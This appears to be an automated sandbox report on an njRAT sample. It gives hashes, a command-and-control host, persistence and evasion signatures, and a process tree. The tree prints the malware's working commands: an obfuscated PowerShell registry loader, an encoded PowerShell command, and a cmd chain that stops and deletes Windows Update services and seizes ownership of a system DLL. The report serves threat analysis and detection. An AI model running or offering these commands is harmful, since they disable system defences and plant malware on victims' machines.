njrat | 46171b542b7193ba06131b31eb65ea14c02e7fda4c09572c628dc6c3caebdfa1

Analysis

max time kernel
153s
max time network
150s
platform
windows7_x64
resource
win7-20220715-en
resource tags

arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
submitted
03-08-2022 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
Size

23.2MB
MD5

abb6afb4def4acfdd8cd790a9eef428d
SHA1

bd1fe3b2d4199e4ffbd90541b5604643ac471fc1
SHA256

46171b542b7193ba06131b31eb65ea14c02e7fda4c09572c628dc6c3caebdfa1
SHA512

cedff678884809a7057b81f0a81e23e5756f2c62dab3eb3e5504777a3ad900a76ef37076dfdd07fe6b781f9f4b472202a9748ea5ec88815fae77adaa370e2086

Score

10^/10

njrat hacked discovery evasion exploit persistence pyinstaller trojan

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

pesho.firecho.cc:5552

Mutex

95806694d02a9b98224f6826b0a19e35

Attributes

reg_key
95806694d02a9b98224f6826b0a19e35
splitter
|'|'|

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1624 created 416 1624 powershell.EXE winlogon.exe
PID 1236 created 416 1236 powershell.EXE winlogon.exe
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Executes dropped EXE 7 IoCs

Processes:

Server.exetest.exenitro_generator.exenitro_generator.exeExplorer.EXEserver.exeupdater.exe

pid process

944 Server.exe
1956 test.exe
1684 nitro_generator.exe
1280 nitro_generator.exe
1288 Explorer.EXE
1828 server.exe
968 updater.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

816 netsh.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1220 takeown.exe
2008 icacls.exe
1680 takeown.exe
632 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	pid	process	target process
PID 1624 created 416	1624	powershell.EXE	winlogon.exe
PID 1236 created 416	1236	powershell.EXE	winlogon.exe

pid	process
944	Server.exe
1956	test.exe
1684	nitro_generator.exe
1280	nitro_generator.exe
1288	Explorer.EXE
1828	server.exe
968	updater.exe

pid	process
816	netsh.exe

pid	process
1220	takeown.exe
2008	icacls.exe
1680	takeown.exe
632	icacls.exe

Drops startup file 2 IoCs

Processes:

server.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe	server.exe

Loads dropped DLL 7 IoCs

Processes:

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exenitro_generator.exeExplorer.EXEtaskeng.exe

pid	process
1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
1684	nitro_generator.exe
1280	nitro_generator.exe
1288	Explorer.EXE
944	taskeng.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1220 takeown.exe
2008 icacls.exe
1680 takeown.exe
632 icacls.exe

pid	process
1220	takeown.exe
2008	icacls.exe
1680	takeown.exe
632	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-335065374-4263250628-1829373619-1000\Software\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .."	server.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

test.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1956 set thread context of 1972	1956	test.exe	conhost.exe
PID 1624 set thread context of 2040	1624	powershell.EXE	dllhost.exe
PID 1236 set thread context of 468	1236	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

test.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	test.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	test.exe

Drops file in Windows directory 5 IoCs

Processes:

conhost.exeServer.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\server.exe	Server.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1780 sc.exe
2024 sc.exe
588 sc.exe
1984 sc.exe
1212 sc.exe
1820 sc.exe
1928 sc.exe
1680 sc.exe
1620 sc.exe
1336 sc.exe

pid	process
1780	sc.exe
2024	sc.exe
588	sc.exe
1984	sc.exe
1212	sc.exe
1820	sc.exe
1928	sc.exe
1680	sc.exe
1620	sc.exe
1336	sc.exe

Detects Pyinstaller 7 IoCs

pyinstaller

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller
\Users\Admin\AppData\Local\Temp\nitro_generator.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1716 schtasks.exe

pid	process
1716	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

updater.exepowershell.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 7085726c04a7d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe

Modifies registry key 1 TTPs 14 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1948	reg.exe
2004	reg.exe
912	reg.exe
1336	reg.exe
1336	reg.exe
1236	reg.exe
1428	reg.exe
2004	reg.exe
2040	reg.exe
1680	reg.exe
568	reg.exe
1608	reg.exe
900	reg.exe
2024	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exetest.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
1516	powershell.exe
468	powershell.exe
1956	test.exe
1236	powershell.EXE
1624	powershell.EXE
1624	powershell.EXE
1236	powershell.EXE
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
468	dllhost.exe
468	dllhost.exe
468	dllhost.exe
468	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe
2040	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeserver.exetakeown.exetest.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exesvchost.exepowershell.exeupdater.exe

description	pid	process
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	1828	server.exe
Token: SeTakeOwnershipPrivilege	1220	takeown.exe
Token: SeDebugPrivilege	1956	test.exe
Token: 33	1828	server.exe
Token: SeIncBasePriorityPrivilege	1828	server.exe
Token: SeDebugPrivilege	1236	powershell.EXE
Token: SeDebugPrivilege	1624	powershell.EXE
Token: SeDebugPrivilege	1624	powershell.EXE
Token: SeDebugPrivilege	1236	powershell.EXE
Token: SeDebugPrivilege	2040	dllhost.exe
Token: SeDebugPrivilege	468	dllhost.exe
Token: 33	1828	server.exe
Token: SeIncBasePriorityPrivilege	1828	server.exe
Token: 33	1828	server.exe
Token: SeIncBasePriorityPrivilege	1828	server.exe
Token: SeAuditPrivilege	872	svchost.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: 33	1828	server.exe
Token: SeIncBasePriorityPrivilege	1828	server.exe
Token: SeDebugPrivilege	968	updater.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe
Token: SeBackupPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeShutdownPrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeUndockPrivilege	872	svchost.exe
Token: SeManageVolumePrivilege	872	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeSystemtimePrivilege	872	svchost.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

svchost.exe

pid process

872 svchost.exe

pid	process
872	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exetest.exeServer.exeserver.execmd.exe

description	pid	process	target process
PID 1112 wrote to memory of 1516	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1112 wrote to memory of 1516	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1112 wrote to memory of 1516	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1112 wrote to memory of 1516	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	powershell.exe
PID 1112 wrote to memory of 944	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1112 wrote to memory of 944	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1112 wrote to memory of 944	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1112 wrote to memory of 944	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	Server.exe
PID 1112 wrote to memory of 1956	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1112 wrote to memory of 1956	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1112 wrote to memory of 1956	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1112 wrote to memory of 1956	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	test.exe
PID 1112 wrote to memory of 1684	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1112 wrote to memory of 1684	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1112 wrote to memory of 1684	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1112 wrote to memory of 1684	1112	pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe	nitro_generator.exe
PID 1684 wrote to memory of 1280	1684	nitro_generator.exe	nitro_generator.exe
PID 1684 wrote to memory of 1280	1684	nitro_generator.exe	nitro_generator.exe
PID 1684 wrote to memory of 1280	1684	nitro_generator.exe	nitro_generator.exe
PID 1956 wrote to memory of 468	1956	test.exe	powershell.exe
PID 1956 wrote to memory of 468	1956	test.exe	powershell.exe
PID 1956 wrote to memory of 468	1956	test.exe	powershell.exe
PID 944 wrote to memory of 1828	944	Server.exe	server.exe
PID 944 wrote to memory of 1828	944	Server.exe	server.exe
PID 944 wrote to memory of 1828	944	Server.exe	server.exe
PID 944 wrote to memory of 1828	944	Server.exe	server.exe
PID 1828 wrote to memory of 816	1828	server.exe	netsh.exe
PID 1828 wrote to memory of 816	1828	server.exe	netsh.exe
PID 1828 wrote to memory of 816	1828	server.exe	netsh.exe
PID 1828 wrote to memory of 816	1828	server.exe	netsh.exe
PID 1956 wrote to memory of 980	1956	test.exe	cmd.exe
PID 1956 wrote to memory of 980	1956	test.exe	cmd.exe
PID 1956 wrote to memory of 980	1956	test.exe	cmd.exe
PID 980 wrote to memory of 1780	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1780	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1780	980	cmd.exe	sc.exe
PID 980 wrote to memory of 2024	980	cmd.exe	sc.exe
PID 980 wrote to memory of 2024	980	cmd.exe	sc.exe
PID 980 wrote to memory of 2024	980	cmd.exe	sc.exe
PID 980 wrote to memory of 588	980	cmd.exe	sc.exe
PID 980 wrote to memory of 588	980	cmd.exe	sc.exe
PID 980 wrote to memory of 588	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1928	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1928	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1928	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1680	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1680	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1680	980	cmd.exe	sc.exe
PID 980 wrote to memory of 1336	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1336	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1336	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1608	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1608	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1608	980	cmd.exe	reg.exe
PID 980 wrote to memory of 2004	980	cmd.exe	reg.exe
PID 980 wrote to memory of 2004	980	cmd.exe	reg.exe
PID 980 wrote to memory of 2004	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1948	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1948	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1948	980	cmd.exe	reg.exe
PID 980 wrote to memory of 2040	980	cmd.exe	reg.exe
PID 980 wrote to memory of 2040	980	cmd.exe	reg.exe
PID 980 wrote to memory of 2040	980	cmd.exe	reg.exe
PID 980 wrote to memory of 1220	980	cmd.exe	takeown.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:872

C:\Windows\system32\taskeng.exe
taskeng.exe {01844B87-F8D1-494A-A680-4837471F8848} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAdQBqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBwAHYAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABvAG8AIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1928

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:1620

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1984

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:1212

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1336

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1820

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1236

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:2004

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:1428

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:912

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:900

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1680

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:632

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "eltezqhaqu"
5⤵
PID:1516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1664

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1840

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1144

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:580

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{66cb0d26-2e4e-4a8f-a821-b763ab9ec0fb}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d6a036bb-3f9f-4d0d-997f-0b302b752824}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:468

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1288

C:\Users\Admin\AppData\Local\Temp\pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
"C:\Users\Admin\AppData\Local\Temp\pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1112

